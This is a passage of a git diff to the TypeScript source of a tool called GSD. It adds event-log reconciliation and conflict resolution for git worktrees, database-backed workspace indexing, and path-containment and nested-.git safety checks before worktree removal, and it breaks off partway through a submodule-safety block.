+    lines.push(`## Conflict ${idx + 1}: ${conflict.entityType} ${conflict.entityId}`);
+    lines.push("");
+    lines.push("**Main side events:**");
+    for (const event of conflict.mainSideEvents) {
+      lines.push(`- ${event.cmd} at ${event.ts} (hash: ${event.hash})`);
+      lines.push(`  params: ${JSON.stringify(event.params)}`);
+    }
+    lines.push("");
+    lines.push("**Worktree side events:**");
+    for (const event of conflict.worktreeSideEvents) {
+      lines.push(`- ${event.cmd} at ${event.ts} (hash: ${event.hash})`);
+      lines.push(`  params: ${JSON.stringify(event.params)}`);
+    }
+    lines.push("");
+    lines.push(`**Resolve with:** \`gsd resolve-conflict --entity ${conflict.entityType}:${conflict.entityId} --pick [main|worktree]\``);
+    lines.push("");
+  });
+
+  const content = lines.join("\n");
+  const dir = join(basePath, ".gsd");
+  mkdirSync(dir, { recursive: true });
+  atomicWriteSync(join(dir, "CONFLICTS.md"), content);
+}
+
+// ─── reconcileWorktreeLogs ────────────────────────────────────────────────────
+
+/**
+ * Event-log-based reconciliation algorithm:
+ *
+ * 1. Read both event logs
+ * 2. Find fork point (last common event by hash)
+ * 3. Slice diverged sets from each side
+ * 4. If no divergence on either side → return autoMerged: 0, conflicts: []
+ * 5. detectConflicts() — if any, writeConflictsFile + return early (D-04 all-or-nothing)
+ * 6. If clean: sort merged = mainDiverged + wtDiverged by timestamp, replayAll
+ * 7. Write merged event log (base + merged in timestamp order)
+ * 8. writeManifest
+ * 9. Return { autoMerged: merged.length, conflicts: [] }
+ */
+export function reconcileWorktreeLogs(
+  mainBasePath: string,
+  worktreeBasePath: string,
+): ReconcileResult {
+  // Acquire advisory lock to prevent concurrent reconcile + append races
+  const lock = acquireSyncLock(mainBasePath);
+  if (!lock.acquired) {
+    logWarning("reconcile", "could not acquire sync lock — another reconciliation may be in progress");
+    return { autoMerged: 0, conflicts: [] };
+  }
+
+  try {
+    return _reconcileWorktreeLogsInner(mainBasePath, worktreeBasePath);
+  } finally {
+    releaseSyncLock(mainBasePath);
+  }
+}
+
+function _reconcileWorktreeLogsInner(
+  mainBasePath: string,
+  worktreeBasePath: string,
+): ReconcileResult {
+  // Step 1: Read both logs
+  const mainLogPath = join(mainBasePath, ".gsd", "event-log.jsonl");
+  const wtLogPath = join(worktreeBasePath, ".gsd", "event-log.jsonl");
+
+  const mainEvents = readEvents(mainLogPath);
+  const wtEvents = readEvents(wtLogPath);
+
+  // Step 2: Find fork point
+  const forkPoint = findForkPoint(mainEvents, wtEvents);
+
+  // Step 3: Slice diverged sets
+  const mainDiverged = mainEvents.slice(forkPoint + 1);
+  const wtDiverged = wtEvents.slice(forkPoint + 1);
+
+  // Step 4: No divergence on either side
+  if (mainDiverged.length === 0 && wtDiverged.length === 0) {
+    return { autoMerged: 0, conflicts: [] };
+  }
+
+  // Step 5: Detect conflicts (entity-level)
+  const conflicts = detectConflicts(mainDiverged, wtDiverged);
+  if (conflicts.length > 0) {
+    // D-04: atomic all-or-nothing — block entire merge
+    writeConflictsFile(mainBasePath, conflicts, worktreeBasePath);
+    const conflictSummary = conflicts.slice(0, 3).map(c => `${c.entityType}:${c.entityId}`).join(", ");
+    const truncated = conflicts.length > 3 ? `... and ${conflicts.length - 3} more` : "";
+    logError("reconcile", `${conflicts.length} conflict(s) detected on ${conflictSummary}${truncated}. Details: .gsd/CONFLICTS.md`, { count: String(conflicts.length), path: join(mainBasePath, ".gsd", "CONFLICTS.md") });
+    return { autoMerged: 0, conflicts };
+  }
+
+  // Step 6: Clean merge — stable sort by timestamp (index-based tiebreaker)
+  const indexed = [...mainDiverged, ...wtDiverged].map((e, i) => ({ e, i }));
+  indexed.sort((a, b) => a.e.ts.localeCompare(b.e.ts) || a.i - b.i);
+  const merged = indexed.map(({ e }) => e);
+
+  // Step 7: Write merged event log FIRST (so crash recovery can re-derive DB state)
+  // Guard: detect concurrent appendEvent calls between our read (step 1) and
+  // this rewrite. If the log grew, re-read and retry to avoid dropping events.
+  const preWriteEvents = readEvents(mainLogPath);
+  if (preWriteEvents.length > mainEvents.length) {
+    logWarning("reconcile", `Event log grew during reconcile (${mainEvents.length} → ${preWriteEvents.length}), retrying with fresh read`);
+    return _reconcileWorktreeLogsInner(mainBasePath, worktreeBasePath);
+  }
+
+  const baseEvents = mainEvents.slice(0, forkPoint + 1);
+  const mergedLog = baseEvents.concat(merged);
+  const logContent = mergedLog.map((e) => JSON.stringify(e)).join("\n") + (mergedLog.length > 0 ? "\n" : "");
+  mkdirSync(join(mainBasePath, ".gsd"), { recursive: true });
+  atomicWriteSync(join(mainBasePath, ".gsd", "event-log.jsonl"), logContent);
+
+  // Step 8: Replay into DB (wrapped in a transaction by replayEvents)
+  openDatabase(join(mainBasePath, ".gsd", "gsd.db"));
+  replayEvents(merged);
+
+  // Step 9: Write manifest
+  try {
+    writeManifest(mainBasePath);
+  } catch (err) {
+    logWarning("reconcile", "manifest write failed (non-fatal)", { error: (err as Error).message });
+  }
+
+  // Step 10: Invalidate caches so deriveState() sees post-reconcile DB state.
+  // Use targeted invalidation (not invalidateAllCaches) to avoid wiping artifacts table.
+  invalidateStateCache();
+  clearPathCache();
+  clearParseCache();
+
+  return { autoMerged: merged.length, conflicts: [] };
+}
+
+// ─── Conflict Resolution (D-06) ─────────────────────────────────────────────
+
+/**
+ * Parse CONFLICTS.md and return structured ConflictEntry[].
+ * Returns empty array when CONFLICTS.md does not exist.
+ *
+ * Parses the format written by writeConflictsFile:
+ *   ## Conflict N: {entityType} {entityId}
+ *   **Main side events:**
+ *   - {cmd} at {ts} (hash: {hash})
+ *     params: {JSON}
+ *   **Worktree side events:**
+ *   - {cmd} at {ts} (hash: {hash})
+ *     params: {JSON}
+ */
+export function listConflicts(basePath: string): ConflictEntry[] {
+  const conflictsPath = join(basePath, ".gsd", "CONFLICTS.md");
+  if (!existsSync(conflictsPath)) return [];
+
+  const content = readFileSync(conflictsPath, "utf-8");
+  const conflicts: ConflictEntry[] = [];
+
+  // Split into per-conflict sections on "## Conflict N:" headings
+  const sections = content.split(/^## Conflict \d+:/m).slice(1);
+
+  for (const section of sections) {
+    // Extract entity type and id from first line: " {entityType} {entityId}"
+    const headingMatch = section.match(/^\s+(\S+)\s+(\S+)/);
+    if (!headingMatch) continue;
+    const entityType = headingMatch[1]!;
+    const entityId = headingMatch[2]!;
+
+    // Split into main/worktree blocks
+    const mainMatch = section.split("**Main side events:**")[1];
+    const wtMatch = mainMatch?.split("**Worktree side events:**");
+
+    const mainBlock = wtMatch?.[0] ?? "";
+    const wtBlock = wtMatch?.[1] ?? "";
+
+    const mainSideEvents = parseEventBlock(mainBlock);
+    const worktreeSideEvents = parseEventBlock(wtBlock);
+
+    conflicts.push({ entityType, entityId, mainSideEvents, worktreeSideEvents });
+  }
+
+  return conflicts;
+}
+
+/**
+ * Parse a block of event lines from CONFLICTS.md into WorkflowEvent[].
+ * Each event spans two lines:
+ *   - {cmd} at {ts} (hash: {hash})
+ *     params: {JSON}
+ */
+function parseEventBlock(block: string): WorkflowEvent[] {
+  const events: WorkflowEvent[] = [];
+  // Find lines starting with "- " (event lines)
+  const lines = block.split("\n");
+  let i = 0;
+  while (i < lines.length) {
+    const line = lines[i]!.trim();
+    if (line.startsWith("- ")) {
+      // Parse: - {cmd} at {ts} (hash: {hash})
+      const eventMatch = line.match(/^-\s+(\S+)\s+at\s+(\S+)\s+\(hash:\s+(\S+)\)$/);
+      if (eventMatch) {
+        const cmd = eventMatch[1]!;
+        const ts = eventMatch[2]!;
+        const hash = eventMatch[3]!;
+
+        // Next line: "  params: {JSON}"
+        let params: Record<string, unknown> = {};
+        const nextLine = lines[i + 1];
+        if (nextLine) {
+          const paramsMatch = nextLine.trim().match(/^params:\s+(.+)$/);
+          if (paramsMatch) {
+            try {
+              params = JSON.parse(paramsMatch[1]!) as Record<string, unknown>;
+            } catch (e) {
+              logWarning("reconcile", `tool call params parse failed: ${(e as Error).message}`);
+            }
+            i++; // consume params line
+          }
+        }
+
+        events.push({ cmd, params, ts, hash, actor: "agent", session_id: getSessionId() });
+      }
+    }
+    i++;
+  }
+  return events;
+}
+
+/**
+ * Resolve a single conflict by picking one side's events.
+ * Replays the picked events through the DB helpers, rewrites the chosen side's
+ * event log so the conflict is durable, and updates or removes CONFLICTS.md.
+ *
+ * When the last conflict is resolved, non-conflicting events from both sides
+ * are also replayed (they were blocked by the all-or-nothing D-04 rule).
+ */
+export function resolveConflict(
+  basePath: string,
+  worktreeBasePath: string,
+  entityKey: string,  // e.g. "task:T01"
+  pick: "main" | "worktree",
+): void {
+  const conflicts = listConflicts(basePath);
+  const colonIdx = entityKey.indexOf(":");
+  const entityType = entityKey.slice(0, colonIdx);
+  const entityId = entityKey.slice(colonIdx + 1);
+
+  const idx = conflicts.findIndex((c) => c.entityType === entityType && c.entityId === entityId);
+  if (idx === -1) throw new Error(`No conflict found for entity ${entityKey}`);
+
+  const conflict = conflicts[idx]!;
+  const eventsToReplay = pick === "main" ? conflict.mainSideEvents : conflict.worktreeSideEvents;
+
+  const mainLogPath = join(basePath, ".gsd", "event-log.jsonl");
+  const wtLogPath = join(worktreeBasePath, ".gsd", "event-log.jsonl");
+  const mainEvents = readEvents(mainLogPath);
+  const wtEvents = readEvents(wtLogPath);
+  const forkPoint = findForkPoint(mainEvents, wtEvents);
+  const mainBaseEvents = mainEvents.slice(0, forkPoint + 1);
+  const wtBaseEvents = wtEvents.slice(0, forkPoint + 1);
+  const mainDiverged = mainEvents.slice(forkPoint + 1);
+  const wtDiverged = wtEvents.slice(forkPoint + 1);
+
+  const rewrittenTargetEvents = pick === "main"
+    ? rewriteDivergedEventsForEntity(wtDiverged, entityType, entityId, eventsToReplay)
+    : rewriteDivergedEventsForEntity(mainDiverged, entityType, entityId, eventsToReplay);
+
+  const targetBasePath = pick === "main" ? worktreeBasePath : basePath;
+  const targetBaseEvents = pick === "main" ? wtBaseEvents : mainBaseEvents;
+  writeEventLog(targetBasePath, targetBaseEvents.concat(rewrittenTargetEvents));
+
+  // Replay resolved events through the DB (updates DB state)
+  openDatabase(join(basePath, ".gsd", "gsd.db"));
+  replayEvents(eventsToReplay);
+  invalidateStateCache();
+  clearPathCache();
+  clearParseCache();
+
+  // Remove resolved conflict from list
+  conflicts.splice(idx, 1);
+
+  if (conflicts.length === 0) {
+    // All conflicts resolved — remove CONFLICTS.md and re-run reconciliation
+    // to pick up non-conflicting events that were blocked by D-04 all-or-nothing.
+    removeConflictsFile(basePath);
+    if (worktreeBasePath) {
+      reconcileWorktreeLogs(basePath, worktreeBasePath);
+    }
+  } else {
+    // Re-write CONFLICTS.md with remaining conflicts
+    writeConflictsFile(basePath, conflicts, worktreeBasePath);
+  }
+}
+
+/**
+ * Remove CONFLICTS.md — called when all conflicts are resolved.
+ * No-op if CONFLICTS.md does not exist.
+ */
+export function removeConflictsFile(basePath: string): void {
+  const conflictsPath = join(basePath, ".gsd", "CONFLICTS.md");
+  if (existsSync(conflictsPath)) {
+    unlinkSync(conflictsPath);
+  }
+}
diff --git a/src/resources/extensions/gsd/workflow-templates.ts b/src/resources/extensions/gsd/workflow-templates.ts
index 2c4b9daf1..b6070c32c 100644
--- a/src/resources/extensions/gsd/workflow-templates.ts
+++ b/src/resources/extensions/gsd/workflow-templates.ts
@@ -58,8 +58,17 @@ let cachedRegistry: TemplateRegistry | null = null;
 export function loadRegistry(): TemplateRegistry {
   if (cachedRegistry) return cachedRegistry;
 
-  const content = readFileSync(registryPath, "utf-8");
-  cachedRegistry = JSON.parse(content) as TemplateRegistry;
+  if (!existsSync(registryPath)) {
+    cachedRegistry = { version: 1, templates: {} };
+    return cachedRegistry;
+  }
+
+  try {
+    const content = readFileSync(registryPath, "utf-8");
+    cachedRegistry = JSON.parse(content) as TemplateRegistry;
+  } catch {
+    cachedRegistry = { version: 1, templates: {} };
+  }
   return cachedRegistry;
 }
 
diff --git a/src/resources/extensions/gsd/workspace-index.ts b/src/resources/extensions/gsd/workspace-index.ts
index b736ac5b3..28fa95df1 100644
--- a/src/resources/extensions/gsd/workspace-index.ts
+++ b/src/resources/extensions/gsd/workspace-index.ts
@@ -1,6 +1,8 @@
 import { join } from "node:path";
 
-import { loadFile, parsePlan, parseRoadmap } from "./files.js";
+import { loadFile } from "./files.js";
+import { isDbAvailable, getMilestoneSlices, getSliceTasks } from "./gsd-db.js";
+import { parseRoadmap, parsePlan } from "./parsers-legacy.js";
 import {
   resolveMilestoneFile,
   resolveSliceFile,
@@ -9,9 +11,9 @@ import {
   resolveTasksDir,
 } from "./paths.js";
 import { deriveState } from "./state.js";
+import { extractVerdict } from "./verdict-parser.js";
 import { milestoneIdSort, findMilestoneIds } from "./guided-flow.js";
 import type { RiskLevel } from "./types.js";
-import { type ValidationIssue, validateCompleteBoundary, validatePlanBoundary } from "./observability-validator.js";
 import { getSliceBranchName, detectWorktreeName } from "./worktree.js";
 
 export interface WorkspaceTaskTarget {
@@ -41,6 +43,10 @@ export interface WorkspaceMilestoneTarget {
   id: string;
   title: string;
   roadmapPath?: string;
+  /** Authoritative milestone lifecycle status from the GSD state registry. */
+  status?: "complete" | "active" | "pending" | "parked";
+  /** Milestone validation verdict, when validation has been performed. */
+  validationVerdict?: "pass" | "needs-attention" | "needs-remediation";
   slices: WorkspaceSliceTarget[];
 }
 
@@ -59,13 +65,15 @@ export interface GSDWorkspaceIndex {
     phase: string;
   };
   scopes: WorkspaceScopeTarget[];
-  validationIssues: ValidationIssue[];
+  validationIssues: Array<Record<string, unknown>>;
 }
 
-
+// Extract milestone title from roadmap header without using parsers.
+// Falls back to the milestone ID if no title line found.
 function titleFromRoadmapHeader(content: string, fallbackId: string): string {
-  const roadmap = parseRoadmap(content);
-  return roadmap.title.replace(/^M\d+(?:-[a-z0-9]{6})?[^:]*:\s*/, "") || fallbackId;
+  // Parse the "# M001: Title" header directly
+  const match = content.match(/^#\s+M\d+(?:-[a-z0-9]{6})?[^:]*:\s*(.+)/m);
+  return match?.[1]?.trim() || fallbackId;
 }
 
 async function indexSlice(basePath: string, milestoneId: string, sliceId: string, fallbackTitle: string, done: boolean, roadmapMeta?: { risk?: RiskLevel; depends?: string[]; demo?: string }): Promise<WorkspaceSliceTarget> {
@@ -77,12 +85,30 @@ async function indexSlice(basePath: string, milestoneId: string, sliceId: string
   const tasks: WorkspaceTaskTarget[] = [];
   let title = fallbackTitle;
 
-  if (planPath) {
-    const content = await loadFile(planPath);
-    if (content) {
-      const plan = parsePlan(content);
-      title = plan.title || fallbackTitle;
-      for (const task of plan.tasks) {
+  // Prefer DB for task data, fall back to file parsing when DB has no data
+  let usedDb = false;
+  if (isDbAvailable()) {
+    const dbTasks = getSliceTasks(milestoneId, sliceId);
+    if (dbTasks.length > 0) {
+      usedDb = true;
+      for (const task of dbTasks) {
+        title = fallbackTitle; // title comes from slice-level data, not plan
+        tasks.push({
+          id: task.id,
+          title: task.title,
+          done: task.status === "complete" || task.status === "done",
+          planPath: resolveTaskFile(basePath, milestoneId, sliceId, task.id, "PLAN") ?? undefined,
+          summaryPath: resolveTaskFile(basePath, milestoneId, sliceId, task.id, "SUMMARY") ?? undefined,
+        });
+      }
+    }
+  }
+  if (!usedDb && planPath) {
+    // File-based fallback: parse slice plan for task entries
+    const planContent = await loadFile(planPath);
+    if (planContent) {
+      const parsed = parsePlan(planContent);
+      for (const task of parsed.tasks) {
         tasks.push({
           id: task.id,
           title: task.title,
@@ -111,53 +137,52 @@ async function indexSlice(basePath: string, milestoneId: string, sliceId: string
 }
 
 export interface IndexWorkspaceOptions {
-  /**
-   * When true, run validatePlanBoundary and validateCompleteBoundary for each slice.
-   * Skipped by default — validation is expensive (content analysis) and only needed
-   * for explicit doctor/audit flows. The /gsd status dashboard and scope pickers
-   * don't need the full issue list.
-   */
   validate?: boolean;
 }
 
 export async function indexWorkspace(basePath: string, opts: IndexWorkspaceOptions = {}): Promise<GSDWorkspaceIndex> {
   const milestoneIds = findMilestoneIds(basePath);
   const milestones: WorkspaceMilestoneTarget[] = [];
-  const validationIssues: ValidationIssue[] = [];
-  const runValidation = opts.validate === true;
 
   for (const milestoneId of milestoneIds) {
     const roadmapPath = resolveMilestoneFile(basePath, milestoneId, "ROADMAP") ?? undefined;
     let title = milestoneId;
     const slices: WorkspaceSliceTarget[] = [];
 
-    if (roadmapPath) {
-      const roadmapContent = await loadFile(roadmapPath);
-      if (roadmapContent) {
-        const roadmap = parseRoadmap(roadmapContent);
-        title = titleFromRoadmapHeader(roadmapContent, milestoneId);
+    if (roadmapPath || isDbAvailable()) {
+      // Normalize slices from DB, fall back to file-based parsing when DB has no data
+      type NormSlice = { id: string; done: boolean; title: string; risk: string; depends: string[]; demo: string };
+      let normSlices: NormSlice[] | null = null;
+      if (isDbAvailable()) {
+        const dbSlices = getMilestoneSlices(milestoneId);
+        if (dbSlices.length > 0) {
+          normSlices = dbSlices.map(s => ({ id: s.id, done: s.status === "complete", title: s.title, risk: s.risk || "medium", depends: s.depends, demo: s.demo }));
+        }
+        // Get title from roadmap header
+        if (roadmapPath) {
+          const roadmapContent = await loadFile(roadmapPath);
+          if (roadmapContent) title = titleFromRoadmapHeader(roadmapContent, milestoneId);
+        }
+      }
+      if (!normSlices && roadmapPath) {
+        // File-based fallback: parse roadmap for slice entries
+        const roadmapContent = await loadFile(roadmapPath);
+        if (roadmapContent) {
+          title = titleFromRoadmapHeader(roadmapContent, milestoneId);
+          const parsed = parseRoadmap(roadmapContent);
+          normSlices = parsed.slices.map(s => ({ id: s.id, done: s.done, title: s.title, risk: s.risk || "medium", depends: s.depends, demo: s.demo || "" }));
+        }
+      }
+      if (!normSlices) normSlices = [];
 
-        // Parallelise all per-slice I/O: indexSlice + (optional) validation calls run concurrently.
-        // Order is preserved via Promise.all on an array built from roadmap.slices.
+      if (normSlices.length > 0) {
         const sliceResults = await Promise.all(
-          roadmap.slices.map(async (slice) => {
-            if (runValidation) {
-              const [indexedSlice, planIssues, completeIssues] = await Promise.all([
-                indexSlice(basePath, milestoneId, slice.id, slice.title, slice.done, { risk: slice.risk, depends: slice.depends, demo: slice.demo }),
-                validatePlanBoundary(basePath, milestoneId, slice.id),
-                validateCompleteBoundary(basePath, milestoneId, slice.id),
-              ]);
-              return { indexedSlice, issues: [...planIssues, ...completeIssues] };
-            }
-            const indexedSlice = await indexSlice(basePath, milestoneId, slice.id, slice.title, slice.done, { risk: slice.risk, depends: slice.depends, demo: slice.demo });
-            return { indexedSlice, issues: [] as ValidationIssue[] };
+          normSlices.map(async (slice) => {
+            return indexSlice(basePath, milestoneId, slice.id, slice.title, slice.done, { risk: slice.risk as RiskLevel, depends: slice.depends, demo: slice.demo });
           }),
         );
 
-        for (const { indexedSlice, issues } of sliceResults) {
-          slices.push(indexedSlice);
-          validationIssues.push(...issues);
-        }
+        slices.push(...sliceResults);
       }
     }
 
@@ -172,6 +197,31 @@ export async function indexWorkspace(basePath: string, opts: IndexWorkspaceOptio
     phase: state.phase,
   };
 
+  // Enrich milestones with authoritative status from state registry (#2807)
+  if (state.registry) {
+    const registryMap = new Map(state.registry.map(e => [e.id, e]));
+    for (const milestone of milestones) {
+      const entry = registryMap.get(milestone.id);
+      if (entry) {
+        milestone.status = entry.status;
+      }
+    }
+  }
+
+  // Populate validationVerdict from VALIDATION files (#2807)
+  for (const milestone of milestones) {
+    const validationPath = resolveMilestoneFile(basePath, milestone.id, "VALIDATION");
+    if (validationPath) {
+      const validationContent = await loadFile(validationPath);
+      if (validationContent) {
+        const verdict = extractVerdict(validationContent);
+        if (verdict === "pass" || verdict === "needs-attention" || verdict === "needs-remediation") {
+          milestone.validationVerdict = verdict;
+        }
+      }
+    }
+  }
+
   const scopes: WorkspaceScopeTarget[] = [{ scope: "project", label: "project", kind: "project" }];
   for (const milestone of milestones) {
     scopes.push({ scope: milestone.id, label: `${milestone.id}: ${milestone.title}`, kind: "milestone" });
@@ -187,7 +237,7 @@ export async function indexWorkspace(basePath: string, opts: IndexWorkspaceOptio
     }
   }
 
-  return { milestones, active, scopes, validationIssues };
+  return { milestones, active, scopes, validationIssues: [] };
 }
 
 export async function listDoctorScopeSuggestions(basePath: string): Promise<Array<{ value: string; label: string }>> {
@@ -207,8 +257,7 @@ export async function listDoctorScopeSuggestions(basePath: string): Promise<Arra
 }
 
 export async function getSuggestedNextCommands(basePath: string): Promise<string[]> {
-  // Run validation here since we surface a /gsd doctor audit hint when issues exist.
-  const index = await indexWorkspace(basePath, { validate: true });
+  const index = await indexWorkspace(basePath);
   const scope = index.active.milestoneId && index.active.sliceId
     ? `${index.active.milestoneId}/${index.active.sliceId}`
     : index.active.milestoneId;
@@ -218,7 +267,6 @@ export async function getSuggestedNextCommands(basePath: string): Promise<string
   if (index.active.phase === "executing" || index.active.phase === "summarizing") commands.add("/gsd auto");
   if (scope) commands.add(`/gsd doctor ${scope}`);
   if (scope) commands.add(`/gsd doctor fix ${scope}`);
-  if (index.validationIssues.length > 0 && scope) commands.add(`/gsd doctor audit ${scope}`);
   commands.add("/gsd status");
   return [...commands];
 }
diff --git a/src/resources/extensions/gsd/worktree-command.ts b/src/resources/extensions/gsd/worktree-command.ts
index 4784d9b4f..a1722132d 100644
--- a/src/resources/extensions/gsd/worktree-command.ts
+++ b/src/resources/extensions/gsd/worktree-command.ts
@@ -661,7 +661,7 @@ async function handleMerge(
     // --- Deterministic merge path (preferred) ---
     // Try a direct squash-merge first. Only fall back to LLM on conflict.
     const commitType = inferCommitType(name);
-    const commitMessage = `${commitType}(${name}): merge worktree ${name}`;
+    const commitMessage = `${commitType}: merge worktree ${name}\n\nGSD-Worktree: ${name}`;
 
     // Reconcile worktree DB into main DB before squash merge
     const wtDbPath = join(worktreePath(basePath, name), ".gsd", "gsd.db");
diff --git a/src/resources/extensions/gsd/worktree-manager.ts b/src/resources/extensions/gsd/worktree-manager.ts
index 23ba831a6..37490a30b 100644
--- a/src/resources/extensions/gsd/worktree-manager.ts
+++ b/src/resources/extensions/gsd/worktree-manager.ts
@@ -15,9 +15,11 @@
  *   4. remove()  — git worktree remove + branch cleanup
  */
 
-import { existsSync, mkdirSync, readFileSync, realpathSync, rmSync } from "node:fs";
+import { existsSync, lstatSync, mkdirSync, readdirSync, readFileSync, realpathSync, rmSync } from "node:fs";
+import { execFileSync } from "node:child_process";
 import { join, resolve, sep } from "node:path";
 import { GSDError, GSD_PARSE_ERROR, GSD_STALE_STATE, GSD_LOCK_HELD, GSD_GIT_ERROR, GSD_MERGE_CONFLICT } from "./errors.js";
+import { logWarning } from "./workflow-logger.js";
 import {
   nativeBranchDelete,
   nativeBranchExists,
@@ -87,16 +89,18 @@ function normalizePathForComparison(path: string): string {
  */
 export function resolveGitDir(basePath: string): string {
   const gitPath = join(basePath, ".git");
-  if (!existsSync(gitPath)) return join(basePath, ".git");
+  if (!existsSync(gitPath)) return gitPath;
+  // In a normal repo .git is a directory — skip the file read (#3597)
+  if (lstatSync(gitPath).isDirectory()) return gitPath;
   try {
     const content = readFileSync(gitPath, "utf-8").trim();
     if (content.startsWith("gitdir: ")) {
       return resolve(basePath, content.slice(8));
     }
-  } catch {
-    // Not a file or unreadable — fall through to default
+  } catch (e) {
+    logWarning("worktree", `.git file read failed: ${(e as Error).message}`);
   }
-  return join(basePath, ".git");
+  return gitPath;
 }
 
 export function worktreesDir(basePath: string): string {
@@ -111,6 +115,23 @@ export function worktreeBranchName(name: string): string {
   return `worktree/${name}`;
 }
 
+/**
+ * Validate that a path is inside the .gsd/worktrees/ directory.
+ * Resolves symlinks and normalizes ".." traversals before comparison
+ * so that a symlink-resolved or crafted path cannot escape containment.
+ *
+ * Used as a safety gate before any destructive operation (rmSync,
+ * nativeWorktreeRemove --force) to prevent #2365-style data loss.
+ */
+export function isInsideWorktreesDir(basePath: string, targetPath: string): boolean {
+  const wtDirPath = worktreesDir(basePath);
+  const wtDir = existsSync(wtDirPath) ? realpathSync(wtDirPath) : resolve(wtDirPath);
+  const resolved = existsSync(targetPath) ? realpathSync(targetPath) : resolve(targetPath);
+  // The resolved path must start with the worktrees dir followed by a separator,
+  // not merely be a prefix match (e.g. ".gsd/worktrees-extra" must not match).
+  return resolved === wtDir || resolved.startsWith(wtDir + sep);
+}
+
 // ─── Core Operations ───────────────────────────────────────────────────────
 
 /**
@@ -135,9 +156,7 @@ export function createWorktree(basePath: string, name: string, opts: { branch?:
     // worktree can be created in its place.
     const gitFilePath = join(wtPath, ".git");
     if (!existsSync(gitFilePath)) {
-      console.error(
-        `[GSD] Removing stale worktree directory (no .git file): ${wtPath}`,
-      );
+      logWarning("reconcile", `Removing stale worktree directory (no .git file): ${wtPath}`, { worktree: name });
       rmSync(wtPath, { recursive: true, force: true });
     } else {
       throw new GSDError(GSD_STALE_STATE, `Worktree "${name}" already exists at ${wtPath}`);
@@ -277,6 +296,80 @@ export function listWorktrees(basePath: string): WorktreeInfo[] {
   return worktrees;
 }
 
+// ─── Nested .git Detection (#2616) ──────────────────────────────────────
+//
+// Scaffolding tools (create-next-app, cargo init, etc.) create nested .git
+// directories inside worktrees. Git records these as gitlinks (mode 160000)
+// without a .gitmodules entry — so worktree cleanup destroys the only copy
+// of their object database, causing permanent silent data loss.
+
+/** Directories to skip when scanning for nested .git dirs. */
+const NESTED_GIT_SKIP_DIRS = new Set([
+  ".git", ".gsd", "node_modules", ".next", ".nuxt", "dist", "build",
+  "__pycache__", ".tox", ".venv", "venv", "target", "vendor",
+]);
+
+/**
+ * Recursively find nested .git directories inside a worktree root.
+ * Returns paths to directories that contain their own .git (directory, not file).
+ * Skips node_modules, .gsd, and other non-project directories for performance.
+ *
+ * A nested .git *directory* (not a .git file — which is a legitimate worktree
+ * pointer) indicates a scaffolded repo that will become an orphaned gitlink.
+ */
+export function findNestedGitDirs(rootPath: string): string[] {
+  const results: string[] = [];
+
+  function walk(dir: string, depth: number): void {
+    // Cap recursion depth to avoid runaway scanning
+    if (depth > 10) return;
+
+    let entries: string[];
+    try {
+      entries = readdirSync(dir);
+    } catch (e) {
+      logWarning("worktree", `readdirSync failed: ${(e as Error).message}`);
+      return;
+    }
+
+    for (const entry of entries) {
+      if (NESTED_GIT_SKIP_DIRS.has(entry)) continue;
+
+      const fullPath = join(dir, entry);
+
+      // Only follow real directories, not symlinks
+      let stat;
+      try {
+        stat = lstatSync(fullPath);
+      } catch (e) {
+        logWarning("worktree", `lstatSync failed for ${fullPath}: ${(e as Error).message}`);
+        continue;
+      }
+      if (!stat.isDirectory()) continue;
+
+      // Check if this directory contains a .git *directory* (not a .git file).
+      // A .git file is a worktree pointer and is legitimate.
+      // A .git directory is a standalone repo created by scaffolding.
+      const innerGit = join(fullPath, ".git");
+      try {
+        const innerStat = lstatSync(innerGit);
+        if (innerStat.isDirectory()) {
+          results.push(fullPath);
+          // Don't recurse into the nested repo — we found what we need
+          continue;
+        }
+      } catch (e) {
+        logWarning("worktree", `existsSync/.git check failed for ${fullPath}: ${(e as Error).message}`);
+      }
+
+      walk(fullPath, depth + 1);
+    }
+  }
+
+  walk(rootPath, 0);
+  return results;
+}
+
 /**
  * Remove a worktree and optionally delete its branch.
  * If the process is currently inside the worktree, chdir out first.
@@ -296,16 +389,37 @@ export function removeWorktree(
   // time, so its registered path points to the resolved external location.
   // If syncStateToProjectRoot later creates a real .gsd/ directory that
   // shadows the symlink, the computed path diverges from git's record.
+  let gitReportedPath: string | null = null;
   try {
     const entries = nativeWorktreeList(basePath);
     const entry = entries.find(e => e.branch === branch);
     if (entry?.path) {
-      wtPath = entry.path;
+      gitReportedPath = entry.path;
     }
-  } catch { /* fall back to computed path */ }
+  } catch (e) { logWarning("worktree", `nativeWorktreeList parse failed: ${(e as Error).message}`); }
+
+  // Safety gate (#2365): only use the git-reported path if it is actually
+  // inside .gsd/worktrees/.  When .gsd/ was a symlink, git may have resolved
+  // it to an external directory (e.g. a project data folder).  Using that
+  // path for removal would destroy user data.
+  if (gitReportedPath && isInsideWorktreesDir(basePath, gitReportedPath)) {
+    wtPath = gitReportedPath;
+  } else if (gitReportedPath) {
+    console.error(
+      `[GSD] WARNING: git worktree list reported path outside .gsd/worktrees/: ${gitReportedPath}\n` +
+        `  Refusing to use it for removal — falling back to computed path: ${wtPath}`,
+    );
+    // Still tell git to unregister the worktree entry via its reported path,
+    // but do NOT use force and do NOT fall back to rmSync on this path.
+    try { nativeWorktreeRemove(basePath, gitReportedPath, false); } catch (e) { logWarning("worktree", `non-force worktree remove failed for ${gitReportedPath}: ${e instanceof Error ? e.message : String(e)}`); }
+  }
 
   const resolvedWtPath = existsSync(wtPath) ? realpathSync(wtPath) : wtPath;
 
+  // Double-check: the resolved path (after symlink resolution) must also be
+  // inside .gsd/worktrees/ — a symlink inside the directory could point out.
+  const resolvedPathSafe = isInsideWorktreesDir(basePath, resolvedWtPath);
+
   // If we're inside the worktree, move out first — git can't remove an in-use directory
   const cwd = process.cwd();
   const resolvedCwd = existsSync(cwd) ? realpathSync(cwd) : cwd;
@@ -316,24 +430,121 @@ export function removeWorktree(
   if (!existsSync(wtPath)) {
     nativeWorktreePrune(basePath);
     if (deleteBranch) {
-      try { nativeBranchDelete(basePath, branch, true); } catch { /* branch may not exist */ }
+      try { nativeBranchDelete(basePath, branch, true); } catch (e) { logWarning("worktree", `nativeBranchDelete failed: ${(e as Error).message}`); }
     }
     return;
   }
 
-  // Remove worktree using the resolved path (force if requested, to handle dirty worktrees)
-  try { nativeWorktreeRemove(basePath, resolvedWtPath, force); } catch { /* may fail */ }
+  // Submodule safety (#2337): detect submodules with uncommitted changes
+  // before force-removing the worktree. Force removal destroys all uncommitted
+  // state, which is especially destructive for submodule directories.
+  let hasSubmoduleChanges = false;
+  const gitmodulesPath = join(resolvedWtPath, ".gitmodules");
